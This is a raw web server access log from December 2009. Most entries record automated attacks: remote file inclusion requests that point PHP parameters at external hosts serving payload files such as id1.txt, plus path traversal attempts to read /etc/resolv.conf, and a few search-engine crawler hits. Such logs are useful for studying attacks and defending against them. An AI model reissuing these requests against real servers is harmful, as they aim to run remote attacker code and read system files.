207.228.240.75 - - [16/Dec/2009:09:30:02 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 342 "-""-"
222.236.47.182 - - [16/Dec/2009:09:31:00 -0600] "GET /logs/access_log.1247356800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:05 -0600] "GET /?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:05 -0600] "GET /logs/access_log.1235001600%20%20/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:05 -0600] "GET /logs/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:08 -0600] "GET /?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:08 -0600] "GET /logs/access_log.1235001600%20%20/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:08 -0600] "GET /logs/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:50 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:50 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:31:50 -0600] "GET /logs/access_log.1230163200%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:09:32:41 -0600] "GET /logs/access_log.1251504000//poll/poll_ssi.php?include_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:09:32:42 -0600] "GET //poll/poll_ssi.php?include_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:09:32:42 -0600] "GET /logs//poll/poll_ssi.php?include_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:09:32:42 -0600] "GET /logs/access_log.1243209600//poll/poll_ssi.php?include_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:33:42 -0600] "GET /logs/access_log.1247356800/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:33:46 -0600] "GET /logs/access_log.1244592000/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:33:46 -0600] "GET /logs/access_log.1247356800/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:33:48 -0600] "GET /logs/access_log.1253491200//bbs//skin/buzzard_espoon/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:34:15 -0600] "GET /logs/access_log.1236384000/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:09:34:17 -0600] "GET /logs/access_log.1243296000/?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:55 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:55 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:55 -0600] "GET /logs/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:55 -0600] "GET /forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:56 -0600] "GET /logs/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:56 -0600] "GET /forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:56 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:35:56 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:36:35 -0600] "GET /forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:36:35 -0600] "GET /logs/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:36:35 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:09:36:35 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:09:39:37 -0600] "GET /logs/access_log.1240272000%20//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:09:39:37 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:09:39:37 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
203.16.61.106 - - [16/Dec/2009:09:39:59 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:39:59 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:39:59 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:39:59 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:40:35 -0600] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:40:35 -0600] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:40:36 -0600] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:40:36 -0600] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.23.18.102 - - [16/Dec/2009:09:45:38 -0600] "GET /logs/http://fr.webmaster-rank.info/xdata/idx? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:09:45:38 -0600] "GET /http://fr.webmaster-rank.info/xdata/idx? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
194.8.75.145 - - [16/Dec/2009:09:46:08 -0600] "GET /logs/access_log.1232841600 HTTP/1.0" 200 89419 "http://fortpit.pconline.com/logs/access_log.1232841600""Opera/7.54 (Windows NT 5.1; U) [pl]"
66.11.117.195 - - [16/Dec/2009:09:46:40 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:09:46:40 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:09:46:40 -0600] "GET /logs/access_log.1240012800//agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.11.117.195 - - [16/Dec/2009:09:46:40 -0600] "GET /logs/access_log.1246147200//agendax/addevent.inc.php?agendax_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:09:47:16 -0600] "GET /index.php?sub=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
209.151.70.1 - - [16/Dec/2009:09:50:29 -0600] "GET /logs//bbs//skin/zetyx_grayscale/login.php?dir=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:09:50:29 -0600] "GET //bbs//skin/zetyx_grayscale/login.php?dir=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.833"
64.40.103.14 - - [16/Dec/2009:09:50:36 -0600] "GET /logs/index.php?sub=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
67.195.112.125 - - [16/Dec/2009:09:57:07 -0600] "GET / HTTP/1.0" 200 3233 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /logs/access_log.1244073600/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /logs/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /logs/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /logs/access_log.1244073600/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:24 -0600] "GET /modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:30 -0600] "GET /logs/access_log.1243468800/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
203.16.61.106 - - [16/Dec/2009:09:57:30 -0600] "GET /logs/access_log.1243468800/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:09:58:41 -0600] "GET /logs//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:09:58:41 -0600] "GET /logs/access_log.1251244800//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:09:58:41 -0600] "GET //main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:09:59:19 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:09:59:19 -0600] "GET /logs/access_log.1230163200%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:09:59:22 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
94.23.18.102 - - [16/Dec/2009:10:00:15 -0600] "GET /logs/http://fr.webmaster-rank.info/xdata/idx? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:10:00:15 -0600] "GET /http://fr.webmaster-rank.info/xdata/idx? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
218.5.74.92 - - [16/Dec/2009:10:00:43 -0600] "GET /logs/access_log.1240272000%20%20/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:00:43 -0600] "GET /include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:00:43 -0600] "GET /logs/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET /logs/access_log.1249689600//modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET /logs/access_log.1249689600//modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET //modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET /logs//modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET //modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:10:01:42 -0600] "GET /logs//modules/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:02:07 -0600] "GET /logs//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:02:07 -0600] "GET //main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:02:07 -0600] "GET /logs/access_log.1251244800//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:32 -0600] "GET /logs//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:32 -0600] "GET //main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:32 -0600] "GET /logs/access_log.1251244800//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:03:50 -0600] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:03:51 -0600] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:51 -0600] "GET /logs//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:51 -0600] "GET /logs/access_log.1239926400//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:10:03:51 -0600] "GET //main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
65.55.106.137 - - [16/Dec/2009:10:03:53 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.137 - - [16/Dec/2009:10:04:37 -0600] "GET /logs/access_log.1215388800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
221.143.42.249 - - [16/Dec/2009:10:05:08 -0600] "GET /logs/access_log.1251244800//main.php?appserv_root=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.230.165 - - [16/Dec/2009:10:05:56 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0"
65.55.230.165 - - [16/Dec/2009:10:05:56 -0600] "GET /logs/access_log.1115942400 HTTP/1.1" 200 2212 "-""Mozilla/4.0"
218.5.74.92 - - [16/Dec/2009:10:05:57 -0600] "GET /include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:05:57 -0600] "GET /logs/access_log.1240272000%20%20/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:05:57 -0600] "GET /logs/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:10:06:48 -0600] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.37.165.86 - - [16/Dec/2009:10:06:51 -0600] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.55.55.178 - - [16/Dec/2009:10:07:04 -0600] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.55.55.178 - - [16/Dec/2009:10:07:04 -0600] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.55.55.178 - - [16/Dec/2009:10:07:04 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:09:19 -0600] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.5.74.92 - - [16/Dec/2009:10:09:24 -0600] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:09:37 -0600] "GET /logs//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:09:37 -0600] "GET //skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:09:37 -0600] "GET /logs/access_log.1250294400//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:09:37 -0600] "GET /logs/access_log.1248998400//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:10:10:23 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:10:10:23 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 300 "-""-"
64.40.103.14 - - [16/Dec/2009:10:10:23 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 300 "-""-"
64.40.103.14 - - [16/Dec/2009:10:10:23 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 305 "-""-"
209.92.156.53 - - [16/Dec/2009:10:10:30 -0600] "GET //components/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:10:10:30 -0600] "GET /logs//components/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:10:10:30 -0600] "GET /logs/access_log.1235865600//components/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:10:10:37 -0600] "GET /logs/access_log.1256515200//components/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:10:50 -0600] "GET //skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:10:50 -0600] "GET /logs//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:10:50 -0600] "GET /logs/access_log.1248998400//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:10:10:50 -0600] "GET /logs/access_log.1256515200//skin/nzeo_ver4_bbs//setup.php?dir=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:10:10:57 -0600] "GET /logs/access_log.1254700800/forum.php?act=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:10:10:57 -0600] "GET /logs/forum.php?act=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:10:10:57 -0600] "GET /logs/access_log.1252627200/forum.php?act=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [16/Dec/2009:10:10:57 -0600] "GET /forum.php?act=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.55.55.178 - - [16/Dec/2009:10:12:00 -0600] "GET /logs/access_log.1230163200%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.230.165 - - [16/Dec/2009:10:14:19 -0600] "GET /logs/access_log.1253923200 HTTP/1.1" 200 937464 "-""Mozilla/4.0"
218.5.74.92 - - [16/Dec/2009:10:15:28 -0600] "GET /logs/access_log.1240272000/include/lib.inc.php?site_path=http://www.kortech.cn/main/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.171.225.234 - - [16/Dec/2009:10:16:07 -0600] "GET /logs/access_log.1248912000//bemarket/postscript/postscript.php?p_mode=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.171.225.234 - - [16/Dec/2009:10:16:07 -0600] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.171.225.234 - - [16/Dec/2009:10:16:07 -0600] "GET //bemarket/postscript/postscript.php?p_mode=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:10:16:16 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:10:16:17 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
213.171.225.234 - - [16/Dec/2009:10:17:23 -0600] "GET /logs/access_log.1247184000//bemarket/postscript/postscript.php?p_mode=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:10:17:39 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
